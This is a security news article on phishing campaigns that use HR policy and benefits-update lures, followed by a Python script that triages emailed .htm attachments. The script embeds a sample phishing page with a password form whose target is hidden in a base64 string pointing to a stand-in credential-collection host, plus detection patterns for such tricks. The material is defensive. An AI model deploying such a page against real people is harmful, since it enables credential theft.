Abnormal Security reported stopping multiple campaigns using HR policy announcements and benefits updates to steal credentials. (Photo by Carsten Koall/Getty Images)

Researchers on Thursday reported on multiple campaigns they have stopped in which threat actors used HR policy announcements and benefits updates, timed to the start of 2023, to lure victims and steal employees' credentials.

In a blog post, Abnormal Security's Intelligence group said that, just as threat actors use the holidays or notable global events to add relevant content to their attacks, they have now shifted to the beginning-of-year policy changes that corporations typically announce.

While the timing of these campaigns is notable as we’ve transitioned into the new year, the attacks also leverage a combination of tactics that are likely more effective in getting results, said Crane Hassold, director of threat intelligence at Abnormal Security.

Hassold said that because the messages use text related to updated medical benefits and new policies, targeted employees are more likely to take an interest, as they will want to know about any changes that may affect them or their families.

“The most successful attacks incorporate themes that make a target feel personally impacted by the message,” said Hassold. “These attacks also use direct and specific requests for the employee to complete. Instead of merely mentioning that employee benefits have been updated, both of these attacks specifically ask recipients to review a document and electronically sign to acknowledge they’ve seen the updates. At the end of the day, because of sophisticated social engineering threats like these, it’s more important to prevent an attack from reaching a potentially vulnerable end user rather than relying on a user to recognize the threat themselves.”

Jeremy Fuchs, cybersecurity researcher/analyst at Avanan, a Check Point Software Company, added that hackers are always looking to take advantage of timely trends, whether it's a benefits notice at the beginning of the year or something else. Fuchs said hackers are looking to take advantage of what employees are looking for, increasing the likelihood of engagement.

“A key here is understanding the content and context of the email to help block it, as well as fully analyzing the .HTM attachment or any links before delivery and at time of click,” said Fuchs. “Similarly, these attacks would gain Microsoft credentials, meaning that hackers would have access to the full Office suite. That's why it's critical to protect all SaaS apps where communication is done, like Teams and OneDrive, so that your organization has 360-degree protection.”

Patrick Harr, chief executive officer at SlashNext, said the creativity of attackers is impressive and continuously changing to execute successful attacks. Harr said malicious HTML attacks are often the means to perpetrate these types of social engineering attacks because they often are missed by many security defenses.

“That’s why it’s important to have security defenses that can interrogate a file for social engineering intent and malicious code,” Harr said. “That way, when attackers get creative, it doesn’t matter, your defenses will identify and stop them before your users become victims.”
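As an added illustration of the attachment analysis Fuchs and Harr describe, the Python script below statically triages an .htm email attachment for the indicators these campaigns rely on: a password field in an emailed HTML file, a form target outside an allowlist of legitimate login hosts, base64-obfuscated strings in script, and HR/benefits lure wording. This is example code written for this page, not the detection logic of Abnormal Security, Avanan or SlashNext. The sample attachments, the trusted-host list and the lure vocabulary are constructed assumptions for the example; a real deployment would run this before delivery and again at time of click, as Fuchs notes.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts the organisation legitimately signs in through. A password
# field that posts anywhere else is treated as a credential-harvesting form.
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}

# Assumed lure vocabulary, taken from the campaign themes the article describes.
LURE_TERMS = ("benefit", "policy", "acknowledge", "sign in", "sign to", "human resources")

# Constructed sample: an .htm attachment posing as a benefits-policy acknowledgement.
# The visible form action is a placeholder; the script swaps in the real target
# from a base64 literal, a common trick to hide the phishing host from naive scanners.
SAMPLE_HTM = """<html><head><title>2023 Benefits Update - Sign to Acknowledge</title></head>
<body><h2>Updated medical benefits policy: review and sign to acknowledge</h2>
<form id="f" method="POST" action="#">
  <input type="email" name="login" placeholder="Work email">
  <input type="password" name="passwd" placeholder="Password">
  <input type="submit" value="Sign in to review document">
</form>
<script>
document.getElementById("f").action = atob("aHR0cHM6Ly9leGFtcGxlLWxvZ2luLmludmFsaWQvYXV0aC9jb2xsZWN0");
</script></body></html>"""

# Constructed benign sample: a plain notice with no form and no script.
BENIGN_HTM = "<html><body><p>Reminder: the cafeteria closes early on Friday.</p></body></html>"


class AttachmentParser(HTMLParser):
    """Collects form actions, input types, script bodies and visible text."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.input_types, self.scripts, self.text = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as one CDATA chunk.
        (self.scripts if self._in_script else self.text).append(data)


def decode_base64_literals(script):
    """Return the decoded form of every atob("...") literal found in script text."""
    out = []
    for lit in re.findall(r'atob\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)', script):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def triage_attachment(html):
    """Return (verdict, findings); verdict is 'block', 'review' or 'allow'."""
    p = AttachmentParser()
    p.feed(html)
    findings = []

    has_password = "password" in p.input_types
    if has_password:
        findings.append("password field in an emailed HTML file")

    # Credential sinks: static form actions plus URLs recovered from atob() literals.
    script_text = "\n".join(p.scripts)
    decoded = decode_base64_literals(script_text)
    targets = [t for t in p.form_actions if t] + [d for d in decoded if d.startswith(("http://", "https://"))]
    flagged_hosts = []
    for t in targets:
        host = urlparse(t).hostname or ""
        if host and host not in TRUSTED_LOGIN_HOSTS and host not in flagged_hosts:
            flagged_hosts.append(host)
            findings.append(f"form posts to untrusted host {host}")

    if decoded:
        findings.append("base64-obfuscated string(s) in script")
    if re.search(r"\bunescape\(|String\.fromCharCode\(", script_text):
        findings.append("string-decoding obfuscation in script")

    text = " ".join(p.text).lower()
    lures = [w for w in LURE_TERMS if w in text]
    if lures:
        findings.append("HR/benefits lure wording: " + ", ".join(lures))

    if has_password and flagged_hosts:
        verdict = "block"          # credential form aimed at an unknown host
    elif findings:
        verdict = "review"         # suspicious but not conclusive on its own
    else:
        verdict = "allow"
    return verdict, findings


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTM), ("benign", BENIGN_HTM)):
        verdict, findings = triage_attachment(doc)
        print(name, verdict, findings)
```

The static form action alone would pass a naive check, which is why the script decodes `atob()` literals before deciding where credentials go; an attacker can of course obfuscate further (string concatenation, `fromCharCode`), so the regex heuristics only escalate to review and a production scanner would fall back to rendering the page in a sandbox.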